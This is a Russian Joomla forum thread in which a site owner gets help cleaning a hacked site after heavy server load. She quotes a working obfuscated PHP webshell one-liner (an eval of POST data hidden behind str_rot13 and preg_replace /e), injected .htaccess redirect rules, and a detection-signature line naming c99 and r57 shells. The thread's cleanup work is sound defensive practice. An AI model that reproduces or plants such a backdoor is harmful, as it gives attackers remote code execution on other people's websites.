0 Пользователей и 1 Гость просматривают эту тему.
  • 24 Ответов
  • 2569 Просмотров
*

xxx87

  • Захожу иногда
  • 130
  • 4 / 0
  • прошу любить и жаловать
Всем привет! Уже который день подряд видимо кто-то ломит мой сайт.
Нагрузки превышают уже все возможные варианты! 3400 против 300 возможных.
Хостер шлет письма с указанием процесса [/r/article/1143527453385345901/c22cc6d97fe94dba17032c0c3e38]
Но ни папку, ни файл ничего не могу найти. Кто-нибудь сталкивался с этой проблемой?
Проверяла айболитом - нашли вредоносные скрипты в com_rsfirewall/sql/sqlazure/signatures.data.sql
  • 1…ll ekin0x variant'),('kacak','filename','PHP Shell - c99shell kacak variant'),(' liz0zim','filename','PHP Shell - c99shell liz0zim variant'),('r57shell','regex'

Удалила... Так после этого нагрузка к вечеру показала 3400 против 300.
За день до моих поисков и "лечения" 740 против 300.

Помогите! Что делать?!

В .htaccess сейчас:
Код
# www redirect (or vice versa), place that code here. Ensure those
# redirects use the correct RewriteRule syntax and the [R=301,L] flags.
RewriteRule ^([0-9]+)\/([^\d\/]+)([0-9]+)\/$ ?$2$1=$3&%{QUERY_STRING}[L]
RewriteRule ^([0-9]+)\/([^\d\/]+)([0-9]+)$ ?$2$1=$3&%{QUERY_STRING}[L]
RewriteRule ^([0-9]+)\/([^\d\/]+)([0-9]+)%[0-9]+([0-9]+).*[0-9]+_.*%[0-9]+%[0-9]+P([0-9]+)[0-9]+.*H(.*).*ZXZ.*([0-9]+).*X[0-9]+([^\d\/]+)PU[0-9]+R.*MV[0-9]+.*O.*[0-9]+%[0-9]+([^\d\/]+)%[0-9]+%[0-9]+%[0-9]+%[0-9]+([^\d\/]+).*%[0-9]+%[0-9]+%[0-9]+([0-9]+)%[0-9]+([0-9]+)-%[0-9]+%[0-9]+([^\d\/]+)$ ?$25$24=$6&%{QUERY_STRING}[L]
RewriteRule ^([0-9]+)\/([^\d\/]+)([0-9]+).*[0-9]+_[0-9]+.*[0-9]+.*[0-9]+.*[0-9]+.*[0-9]+.*[0-9]+.*[0-9]+.*[0-9]+..*$ ?$2$1=$3&%{QUERY_STRING}[L]
RewriteRule ^([^\d\/]+)-([0-9]+)-([0-9]+)..*$ ?$1$3=$2&%{QUERY_STRING}[L]
RewriteRule ^([0-9]+)\/([^\d\/]+)([0-9]+)\/[0-9]+\/[0-9]+\/[0-9]+\/[0-9]+_.*_.*\/[0-9]+-[0-9]+-.*-G([^\d\/]+)\/[0-9]+_.*_.*_.*_[0-9]+..*$ ?$5$1=$3&%{QUERY_STRING}[L]
RewriteRule ^([0-9]+)\/([^\d\/]+)([0-9]+).*[0-9]+_[0-9]+.*[0-9]+.*[0-9]+.*[0-9]+..*$ ?$2$1=$3&%{QUERY_STRING}[L]
RewriteRule ^([0-9]+)\/([^\d\/]+)([0-9]+)..*$ ?$2$1=$3&%{QUERY_STRING}[L]
RewriteRule ^([0-9]+)\/([^\d\/]+)([0-9]+).*[0-9]+_.*[0-9]+.*[0-9]+.*[0-9]+.*[0-9]+..*$ ?$2$1=$3&%{QUERY_STRING}[L]
RewriteRule ^([0-9]+)\/([^\d\/]+)([0-9]+).*[0-9]+..*$ ?$2$1=$3&%{QUERY_STRING}[L]
RewriteRule ^([0-9]+)\/([^\d\/]+)([0-9]+).*[0-9]+.*-.*..*$ ?$2$1=$3&%{QUERY_STRING}[L]
RewriteRule ^([0-9]+)\/([^\d\/]+)([0-9]+).*[0-9]+.*..*$ ?$2$1=$3&%{QUERY_STRING}[L]
RewriteRule ^([^\d\/]+)\/([0-9]+)\/([0-9]+)$ ?$1$2=$3&%{QUERY_STRING}[L]
RewriteRule ^([^\d\/]+)\/E.*X.*\/([0-9]+)\/S.*N.*E.*\/([0-9]+)$ ?$1$4=$8&%{QUERY_STRING}[L]
« Последнее редактирование: 18.05.2016, 01:27:58 от xxx87 »
*

Филипп Сорокин

  • Завсегдатай
  • 1918
  • 160 / 4
  • разработчик.москва
Цитировать
Что делать?!
Сажать на длительный карантин. Основная идея — запретить всё, что можно, изменить права, "отлучив" сервер от владения файлами, чтобы он не смог их изменять. Необходимо создать такую рабочую среду, в которой будут невозможны любые несанкционированные действия в файловой системе (обязательно не забудьте про open_basedir — иначе "конец" всей системе). Далее по логам ошибок вычислять шеллы.

Кстати, давно обновлялись? Какая версия Joomla?
*

xxx87

  • Захожу иногда
  • 130
  • 4 / 0
  • прошу любить и жаловать
Сажать на длительный карантин. Основная идея — запретить всё, что можно, изменить права, "отлучив" сервер от владения файлами, чтобы он не смог их изменять. Необходимо создать такую рабочую среду, в которой будут невозможны любые несанкционированные действия в файловой системе (обязательно не забудьте про open_basedir — иначе "конец" всей системе). Далее по логам ошибок вычислять шеллы.

Кстати, давно обновлялись? Какая версия Joomla?
Joomla 3.5.0
Сейчас нашла в корне sitemap.xml весом 4.4 Мб вот с такими данными       
Код
<url>
<loc>http://мойсайт.ru/red/5977/36</loc>
<lastmod>2016-05-11</lastmod>
<changefreq>daily</changefreq>
<priority>0.8</priority>
</url>
Те я так понимаю вот это и грузит процц?!
Логи ошибок - это в папке администр? Там в конце часто фигурируют - [11-May-2016 15:41:19 Europe/Moscow] PHP Warning:  Creating default object from empty value in /libraries/joomla/updater/adapters/extension.php on line 61
и
[05-Apr-2016 12:39:10 Europe/Moscow] PHP Strict Standards:  Declaration of JFormRulePwebGoogleAC::test() should be compatible with JFormRule::test(SimpleXMLElement $element, $value, $group = NULL, Joomla\Registry\Registry $input = NULL, JForm $form = NULL) in /modules/mod_pwebcontact/form/rules/pwebgoogleac.php on line 53

*

Филипп Сорокин

  • Завсегдатай
  • 1918
  • 160 / 4
  • разработчик.москва
Не заметил, версия актуальная.
Но лучше обновиться до 3.5.1 — заодно "перезальёте" все файлы CMS.
А Sitemap тут ни при чём.
*

xxx87

  • Захожу иногда
  • 130
  • 4 / 0
  • прошу любить и жаловать
Не заметил, версия актуальная.
Но лучше обновиться до 3.5.1 — заодно "перезальёте" все файлы CMS.
А Sitemap тут ни при чём.
Извините, а open_basedir это же в .ini А я его сразу удалила. А на .htaccess  поставила 444 права - правильно все?! Просто совсем плохо разбираюсь во всем этом пока :(((((((
а вот и чудо находка в index
Спойлер
[свернуть]
« Последнее редактирование: 18.05.2016, 02:08:25 от xxx87 »
*

Филипп Сорокин

  • Завсегдатай
  • 1918
  • 160 / 4
  • разработчик.москва
На виртуальном хостинге вы не имеете доступа к php.ini, описанные мной вещи в моём первом сообщении в рамках виртуального хостинга сделать не получится. Сайт нужно переносить на VDS (найдите самый дешёвый за 500 руб. в месяц). Всё дело в том, что серверу доступны файлы всегда, независимо от того, какие права установлены. Даже если вы поставите 000, то шелл всё равно сможет манипулировать файлами. Тут необходим совсем иной подход.
*

draff

  • Гуру
  • 5803
  • 434 / 7
  • ищу работу
.htaccess заменить на стандартный с архива ДЖумла . Наверно уже и поисковики проиндексировали весь хлам с сайта.
Айболит должен был найти и файлы со скриптом, как в indrx.php. Включите параноидальный режим сканера айболит и проверьте. Или поиск в файлах по кускам кода, в редакторе Notepad++
*

Taatshi

  • Глобальный модератор
  • 5259
  • 481 / 2
  • Верстаем и кодим. Обращайтесь ;)
Я бы на Вашем месте заказала платную чистку. Судя по Вашему общению на форуме, не обижайтесь, но сами Вы не справитесь как мне кажется. Нужно неплохо знать код Joomla и структуру папок и файлов чтоб полностью вычистить сайт. Одного айболита может и не хватить.
ВЕРСТКА, САЙТЫ ПОД КЛЮЧ, УДАЛЕНИЕ ВИРУСОВ, МИГРАЦИЯ НА JOOMLA 3, ОБНОВЛЕНИЕ  |  ОТЗЫВЫ 
Связь: telegram - Taatshi, почта - Taatshi на яндексе, Skype - Taatshi
*

wishlight

  • Живу я здесь
  • 4980
  • 293 / 1
  • от 150 руб быстрый хостинг без блокировок
Однозначно изолировать сайт от других если есть и проверить его ai-bolit хотя бы.

Эта штука не виновата.
com_rsfirewall/sql/sqlazure/signatures.data.sql

Хотя возможно происки хостера  и конкурентов.
*

SDKiller

  • Живу я здесь
  • 2706
  • 329 / 5
  • ...ergo sum
.htaccess заменить на стандартный с архива ДЖумла

+1

com_rsfirewall/sql/sqlazure/signatures.data.sql

Вы всего лишь нашли сигнатуры (образцы фрагментов кода) вредоносных скриптов в установочном sql-файле com_rsfirewall
Думаю вы бы получили аналогичный результат если бы "айболитом" проверили файлы самого айболита.

...Тут необходим совсем иной подход.

Что за бред в целом?

Цитировать
...обязательно не забудьте про open_basedir — иначе "конец" всей системе...
...Сайт нужно переносить на VDS...
...серверу доступны файлы всегда, независимо от того, какие права установлены...

Какой системе конец?

Если она сидит на шареде с единственным сайтом - то open_basedir - забота хостера.
У вменяемого хостера ничего не выйдет за пределы её аккаунта и без open_basedir. А скрипты будут исполняться от пользователя её аккаунта.

И зачем ей vds? Учиться админить?
Или по опыту работы с шаредом просто тупо взять предоставленные данные и развернуть сайт из-под рута?
*

Филипп Сорокин

  • Завсегдатай
  • 1918
  • 160 / 4
  • разработчик.москва
Цитировать
Что за бред в целом?
Куку! Бред в целом — это замена .htaccess на новый и смена прав на шареде, т.к. это ничего не изменит. Поэтому здесь нужен совсем иной подход, нежели смена прав. Здесь ещё нужно сменить владельца пула PHP, что невозможно сделать на шареде.

Цитировать
И зачем ей vds?
см. выше.

Цитировать
open_basedir - забота хостера.
Если автор вдруг захочет чему-то научиться (или же захочет научиться кто-нибудь другой, читающий эту тему), то я уже дал один готовый хороший совет, чем неплохо?
« Последнее редактирование: 18.05.2016, 13:01:09 от Филипп Сорокин »
*

xxx87

  • Захожу иногда
  • 130
  • 4 / 0
  • прошу любить и жаловать
Чистила я чистила и тьфу тьфу вроде все вычистила. Судя по логам ломали через  плагин либо катпродакт для вирт или второй ( не помню как он называется - его аналог ), да и еще одно для коммуникации ( была старая версия ). Обновила все что можно и заменила  все файлы из свежей Joomla. js файлы залила из квикстарта шаблона как и большинство файлов. Обновила rsfirewall, произвела настройки ( но основательно проверю и проведу настройки чуть позже как только Касперыч закончит проверку тотальную моего ноута ). Закрыла доступ к админке паролем.
Теперича думаю на чем все же строить магаз на VirtueMart или на ДШ. Страшно уже что вирт так ломят.
Кстати есть файлы, которые по версии rsfirewall были модифицированны и он предлагает загрузить оригиналы. Что думаете? тк эти файлы я заливала все же с официального дистрибутива. Не пойму на что он ругается.
Сижу и не знаю верить ли своему счастью или это затишье перед бурей.
Кстати вчера после всех манипуляций - нагрузка пришла в норму :))))))))
*

ChaosHead

  • Гуру
  • 5242
  • 451 / 13
Резервную копию сделайте, чтобы не пришлось потом чистить всё заново, если вычистили вдруг не всё
*

Филипп Сорокин

  • Завсегдатай
  • 1918
  • 160 / 4
  • разработчик.москва
Есть хорошая программа для Windows WinMerge — с помощью неё можно произвести сравнение файлов в указанных каталогах. Очень помогает при борьбе с вирусами. Сравнивать нужно с чистым дистрибутивом.
*

xxx87

  • Захожу иногда
  • 130
  • 4 / 0
  • прошу любить и жаловать
ChaosHead и Филипп Сорокин спасибо за советы!
*

winstrool

  • Давно я тут
  • 820
  • 51 / 2
  • Свободен для работы
Я бы посоветовал на недельку поставить какой нить хорошенький снифер запросов, если что нить осталось, то там отследите, плюс также не плохо было бы, если что то отловити, взять ctime-неделя-месяц, и посмотреть изминения.... ну и конечно же профилактические меры безопасности по настройки сервера...
*

xxx87

  • Захожу иногда
  • 130
  • 4 / 0
  • прошу любить и жаловать
Опять пошла нагрузка. Начала шерстить рут файлы и обнаружила вот эту прелесть.
 .clamavconnector.scan
Код
public_html/сайт2/tmp/sfx.php=Win.Trojan.Hide-1
Только сейчас увидела возможность поиска по файлам по части кода в редакторе - занимаюсь. Тк  нагрузка идет от
 [/red/5974/13925] тоже самое что было в карте сайта
Сайт2 я уже благополучно снесла перед чисткой
*

winstrool

  • Давно я тут
  • 820
  • 51 / 2
  • Свободен для работы
Опять пошла нагрузка. Начала шерстить рут файлы и обнаружила вот эту прелесть.
 .clamavconnector.scan
Код
public_html/сайт2/tmp/sfx.php=Win.Trojan.Hide-1
Только сейчас увидела возможность поиска по файлам по части кода в редакторе - занимаюсь. Тк  нагрузка идет от
 [/red/5974/13925] тоже самое что было в карте сайта
Сайт2 я уже благополучно снесла перед чисткой
Там случайно "good day" не было написано?
*

xxx87

  • Захожу иногда
  • 130
  • 4 / 0
  • прошу любить и жаловать
Цитата: winstrool
Там случайно "good day" не было написано?
Вроде бы нет. У меня вообще файлы какие то странные присутствуют в руте. Я к хостеру - пишу проверьте системные ли они - они говорят - если не пользуетесь - удаляйте.
.clamavconnector.scan это же вред файл, я правильно понимаю?!
Вот эти файлы меня очень смущают:
configbak.php
Код
<?php if(isset($_GET['test'])){echo 'success';}else{isset($_POST['kt7uvf']) && ($www= $_POST['kt7uvf']) && @preg_replace('/ad/e','@'.str_rot13('riny').'($www)', 'add');}?>
.pearrc
И все это началось после того как меня ломанули турки - Hacked by Kabss
« Последнее редактирование: 21.05.2016, 00:49:01 от xxx87 »
*

winstrool

  • Давно я тут
  • 820
  • 51 / 2
  • Свободен для работы
*

xxx87

  • Захожу иногда
  • 130
  • 4 / 0
  • прошу любить и жаловать
файлом может быть хоть abracadabra.her.ego.znaet
Как Вы считаете я все эти файлы могу удалить? Тк я все переживаю что системное что нить удалю
*

winstrool

  • Давно я тут
  • 820
  • 51 / 2
  • Свободен для работы
сделайте бекапы и экспериментируйте, что не так, востановите с бекапов....
*

xxx87

  • Захожу иногда
  • 130
  • 4 / 0
  • прошу любить и жаловать
Зараза еще сидела в root папке tmp
Вычистила все теперича :)
*

Филипп Сорокин

  • Завсегдатай
  • 1918
  • 160 / 4
  • разработчик.москва
Чтобы оставить сообщение,
Вам необходимо Войти или Зарегистрироваться
 

При открытии сайта с режима инкогнито перекидывает на вирусный сайт

Автор 62411

Ответов: 4
Просмотров: 168
Последний ответ 26.03.2024, 18:51:10
от wishlight
Netflix! - Клиент поймал фишинг на старый сайт. Где порылись собаки?

Автор Alex_gs

Ответов: 9
Просмотров: 1639
Последний ответ 05.11.2021, 21:47:31
от wishlight
Взломали сайт. Как в некоторых случаях делаю я

Автор cntrl

Ответов: 0
Просмотров: 630
Последний ответ 29.08.2020, 00:25:24
от cntrl
Безопасный вход на сайт Joomla и админка

Автор jm

Ответов: 9
Просмотров: 1427
Последний ответ 19.07.2020, 23:57:17
от wishlight
[Руководство] Как защитить сайт на версии 1.5 (не поддерживается разработчиками)

Автор flyingspook

Ответов: 13
Просмотров: 5827
Последний ответ 08.01.2020, 12:52:55
от winstrool